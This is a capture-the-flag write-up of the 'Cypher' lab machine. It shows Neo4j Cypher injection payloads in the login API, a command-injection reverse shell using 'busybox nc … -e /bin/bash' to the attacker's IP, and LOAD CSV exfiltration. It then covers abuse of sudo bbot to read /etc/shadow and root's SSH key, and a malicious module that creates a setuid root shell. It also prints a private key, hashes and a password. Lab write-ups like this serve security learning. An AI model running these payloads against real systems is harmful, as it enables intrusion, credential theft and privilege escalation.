Cypher
Recon
HTTP (80)
All path goes to /login, but no registration is available.
└─$ feroxbuster -u 'http://cypher.htb/' -k -w /usr/share/seclists/Discovery/Web-Content/common.txt --thorough -n -D -C 404,403,400 -S 0,34
200 GET 126l 274w 3671c http://cypher.htb/login
200 GET 179l 477w 4986c http://cypher.htb/about
200 GET 3l 113w 8123c http://cypher.htb/bootstrap-notify.min.js
200 GET 63l 139w 1548c http://cypher.htb/utils.js
200 GET 2l 1293w 89664c http://cypher.htb/jquery-3.6.1.min.js
200 GET 12l 2173w 195855c http://cypher.htb/bootstrap.min.css
200 GET 7l 1223w 80496c http://cypher.htb/bootstrap.bundle.min.js
200 GET 876l 4886w 373109c http://cypher.htb/logo.png
200 GET 7333l 24018w 208204c http://cypher.htb/vivagraph.min.js
200 GET 162l 360w 4562c http://cypher.htb/
200 GET 5632l 33572w 2776750c http://cypher.htb/us.png
200 GET 162l 360w 4562c http://cypher.htb/index
200 GET 162l 360w 4562c http://cypher.htb/index.html
405 GET 1l 3w 31c http://cypher.htb/api/auth
200 GET 126l 274w 3671c http://cypher.htb/login.html
301 GET 7l 12w 178c http://cypher.htb/testing => http://cypher.htb/testing/Neo4j Procedure
/testing has *.jar file we can inspect
└─$ curl http://cypher.htb/testing/custom-apoc-extension-1.0-SNAPSHOT.jar -LOs
└─$ jd-gui custom-apoc-extension-1.0-SNAPSHOT.jarNeo4j procedure has command injection, if we are able to use it.
Neo4j
After trying to use SQL injection the application crashes with error messages.
Authentication happens with Neo4j query
MATCH (u:USER) -[:SECRET]-> (h:SHA1) WHERE u.name = 'USERNAME' return h.value as hashhttps://www.varonis.com/blog/neo4jection-secrets-data-and-cloud-exploitshttps://pentester.land/blog/cypher-injection-cheatsheet/
SSRF:
{
"username": "' OR 1=1 WITH 1337 AS x CALL db.labels() YIELD label AS d LOAD CSV FROM 'http://10.10.14.114/?'+d AS y RETURN 0 as _0//",
"password":"x"
}
Injection: { "username":"admin' or 1=Date(keys(u)) return 1//", "password":"x" }
Returns: List{String("name")}Injection: { "username":"admin' or 1=Date(keys(h)) return 1//", "password":"x" }
Returns: List{String("value")}Procedures are interesting because previously leaked jar file is a procedure. But payload like following doesn't work. Stack Overflow mentions it because of misconfiguration, but this procedure should be loaded.
' OR 1=1 WITH 1 as _l00 CALL dbms.procedures() yield name LOAD CSV FROM 'https://10.10.14.114/' + name as _l RETURN 1 //Testing by blindly loading extension works
{
"username": "admin' OR EXISTS { CALL custom.getUrlStatusCode('http://10.10.14.114') YIELD statusCode RETURN statusCode } RETURN 1//",
"password": "x"
}
Reverse Shell (neo4j)
curl 'http://cypher.htb/api/auth' --json $'{"username":"admin\' OR EXISTS { CALL custom.getUrlStatusCode(\'http://10.10.14.114 ; busybox nc 10.10.14.114 4444 -e /bin/bash\') YIELD statusCode RETURN statusCode } RETURN 1//","password":"x"}'We are connected as neo4j user and there's 1 normal user on box.
(remote) neo4j@cypher:/$ id
uid=110(neo4j) gid=111(neo4j) groups=111(neo4j)
(remote) neo4j@cypher:/var/www/graphasm$ cat /etc/passwd | grep sh$
root:x:0:0:root:/root:/bin/bash
graphasm:x:1000:1000:graphasm:/home/graphasm:/bin/bash
neo4j:x:110:111:neo4j,,,:/var/lib/neo4j:/bin/bashWe are allowed to read files from the graphasm user
(remote) neo4j@cypher:/var/www/graphasm$ find /home -ls 2>/dev/null
393218 4 drwxr-xr-x 3 root root 4096 Oct 8 17:58 /home
393224 4 drwxr-xr-x 4 graphasm graphasm 4096 Feb 17 12:40 /home/graphasm
393225 4 -rw-r--r-- 1 graphasm graphasm 3771 Mar 31 2024 /home/graphasm/.bashrc
393226 4 -rw-r--r-- 1 graphasm graphasm 807 Mar 31 2024 /home/graphasm/.profile
444510 4 -rw-r----- 1 root graphasm 33 Mar 1 20:25 /home/graphasm/user.txt
393342 0 lrwxrwxrwx 1 root root 9 Oct 8 18:06 /home/graphasm/.bash_history -> /dev/null
393227 4 -rw-r--r-- 1 graphasm graphasm 220 Mar 31 2024 /home/graphasm/.bash_logout
393229 4 drwx------ 2 graphasm graphasm 4096 Oct 8 17:58 /home/graphasm/.ssh
444509 4 -rw-r--r-- 1 graphasm graphasm 156 Feb 14 12:35 /home/graphasm/bbot_preset.yml
393231 4 drwx------ 2 graphasm graphasm 4096 Oct 8 17:58 /home/graphasm/.cache
(remote) neo4j@cypher:/var/www/graphasm$ cat /home/graphasm/bbot_preset.yml
targets:
- ecorp.htb
output_dir: /home/graphasm/bbot_scans
config:
modules:
neo4j:
username: neo4j
password: cU4btyib.20xtCMCXkBmerhKSSH (22)
└─$ sshpass -p 'cU4btyib.20xtCMCXkBmerhK' ssh graphasm@cypher.htb
graphasm@cypher:~$ id
uid=1000(graphasm) gid=1000(graphasm) groups=1000(graphasm)User.txt
graphasm@cypher:~$ cat user.txt
db432ef16f45636e4570c8b3b44d7c4cPrivilege Escalation
graphasm@cypher:~$ sudo -l
Matching Defaults entries for graphasm on cypher:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User graphasm may run the following commands on cypher:
(ALL) NOPASSWD: /usr/local/bin/bbothttps://github.com/blacklanternsecurity/bbot
LFI bbot
You can leak files with Custom Yara Rules combined with Debug mode
graphasm@cypher:~$ sudo bbot --yes --debug --dry-run --custom-yara-rules /etc/passwd 2>&1 | grep sh$
[DBUG] internal.excavate: Final combined yara rule contents: root:x:0:0:root:/root:/bin/bash
graphasm:x:1000:1000:graphasm:/home/graphasm:/bin/bash
neo4j:x:110:111:neo4j,,,:/var/lib/neo4j:/bin/bashRoot doesn't seem to own id_rsa key
graphasm@cypher:~$ sudo bbot --yes --debug --dry-run --custom-yara-rules /etc/shadow 2>&1 | grep '\$y'
[DBUG] internal.excavate: Final combined yara rule contents: root:$y$j9T$ianAmmc1w6VSodw.1fzgk/$3DenO5YJ1VBvE1VekRL79v6bN00fhcbA59zeeLciY67:20133:0:99999:7:::
graphasm:$y$j9T$lDLyqZAxCXhX1EB3v01Zl.$C0XwosQvBM.5sAPbHd8oyAK0e8lg0GX5YJHb7qImQV7:20004:0:99999:7:::Root.txt
graphasm@cypher:~$ sudo bbot --yes --debug --dry-run --custom-yara-rules /root/root.txt 2>&1 | grep 'yara rule'
[DBUG] internal.excavate: Successfully loaded custom yara rules file [/root/root.txt]
[DBUG] internal.excavate: Final combined yara rule contents: acde1a1d904c0f25e5cce9fc74e0c959Login as root (try) (and fail lol)
Either root doesn't have SSH keys at all or it's simply not id_rsa. We can use -v (verbose) mode on SSH to see what keys it tries to use
graphasm@cypher:~$ ssh localhost -v
...
debug1: Authentications that can continue: publickey,password
debug1: Next authentication method: publickey
debug1: Will attempt key: /home/graphasm/.ssh/id_rsa
debug1: Will attempt key: /home/graphasm/.ssh/id_ecdsa
debug1: Will attempt key: /home/graphasm/.ssh/id_ecdsa_sk
debug1: Will attempt key: /home/graphasm/.ssh/id_ed25519
debug1: Will attempt key: /home/graphasm/.ssh/id_ed25519_sk
debug1: Will attempt key: /home/graphasm/.ssh/id_xmss
debug1: Will attempt key: /home/graphasm/.ssh/id_dsa
...graphasm@cypher:~$ for file in id_rsa id_ecdsa id_ecdsa_sk id_ed25519 id_ed25519_sk id_xmss id_dsa; do sudo bbot --yes --debug --dry-run --custom-yara-rules /root/.ssh/$file 2>&1 | sed -n '/contents:/,/\[DBUG\]/p'; done;
[DBUG] internal.excavate: Final combined yara rule contents: /root/.ssh/id_rsa
[DBUG] output.csv: Setting up module csv
[DBUG] internal.excavate: Final combined yara rule contents: /root/.ssh/id_ecdsa
[DBUG] output.csv: Setting up module csv
[DBUG] internal.excavate: Final combined yara rule contents: /root/.ssh/id_ecdsa_sk
[DBUG] output.csv: Setting up module csv
[DBUG] internal.excavate: Final combined yara rule contents: -----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACAgv21YFyMHuBWK6Rwrso22gu7RpL0BtLjfcO2KSBN+5AAAAJC3399Ut9/f
VAAAAAtzc2gtZWQyNTUxOQAAACAgv21YFyMHuBWK6Rwrso22gu7RpL0BtLjfcO2KSBN+5A
AAAEAGEVbsveMGqFEpPtwEUMqc39F1JisXxPdWVl9E7N0nFiC/bVgXIwe4FYrpHCuyjbaC
7tGkvQG0uN9w7YpIE37kAAAAC3Jvb3RAY3lwaGVyAQI=
-----END OPENSSH PRIVATE KEY-----
[DBUG] output.csv: Setting up module csv
[DBUG] internal.excavate: Final combined yara rule contents: /root/.ssh/id_ed25519_sk
[DBUG] output.csv: Setting up module csv
[DBUG] internal.excavate: Final combined yara rule contents: /root/.ssh/id_xmss
[DBUG] output.csv: Setting up module csv
[DBUG] internal.excavate: Final combined yara rule contents: /root/.ssh/id_dsa
[DBUG] output.csv: Setting up module csvDoesn't work
└─$ nano root.id_ed25519
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACAgv21YFyMHuBWK6Rwrso22gu7RpL0BtLjfcO2KSBN+5AAAAJC3399Ut9/f
VAAAAAtzc2gtZWQyNTUxOQAAACAgv21YFyMHuBWK6Rwrso22gu7RpL0BtLjfcO2KSBN+5A
AAAEAGEVbsveMGqFEpPtwEUMqc39F1JisXxPdWVl9E7N0nFiC/bVgXIwe4FYrpHCuyjbaC
7tGkvQG0uN9w7YpIE37kAAAAC3Jvb3RAY3lwaGVyAQI=
-----END OPENSSH PRIVATE KEY-----
└─$ chmod 600 root.id_ed25519
└─$ ssh -i root.id_ed25519 root@cypher.htb
Warning: Permanently added 'cypher.htb' (ED25519) to the list of known hosts.
root@cypher.htb password:Password is not in rock you :/
➜ .\john-1.9.0-jumbo-1-win64\run\john.exe .\hashes.txt --wordlist=.\wordlist.txt --format=cryptRCE bbot
https://www.blacklanternsecurity.com/bbot/Stable/dev/module_howto/#create-the-python-filehttps://www.blacklanternsecurity.com/bbot/Stable/dev/module_howto/#load-modules-from-custom-locations
graphasm@cypher:~$ cd `mktemp -d` && chmod 777 $_
graphasm@cypher:/tmp/tmp.lf21OiOLR3$ echo $'module_dirs:\n - '$(pwd) > letmein.yml
graphasm@cypher:/tmp/tmp.lf21OiOLR3$ echo $'from bbot.modules.base import BaseModule\nimport os\nclass letmein(BaseModule):\n\tasync def setup(self):\n\t\tos.system("install -m4777 /bin/bash /tmp/rootbash")\n\t\treturn True' > letmein.py
graphasm@cypher:/tmp/tmp.lf21OiOLR3$ sudo bbot -p ./letmein.yml -m letmein -y
graphasm@cypher:/tmp/tmp.lf21OiOLR3$ /tmp/rootbash -p
rootbash-5.2# id
uid=1000(graphasm) gid=1000(graphasm) euid=0(root) groups=1000(graphasm)Last updated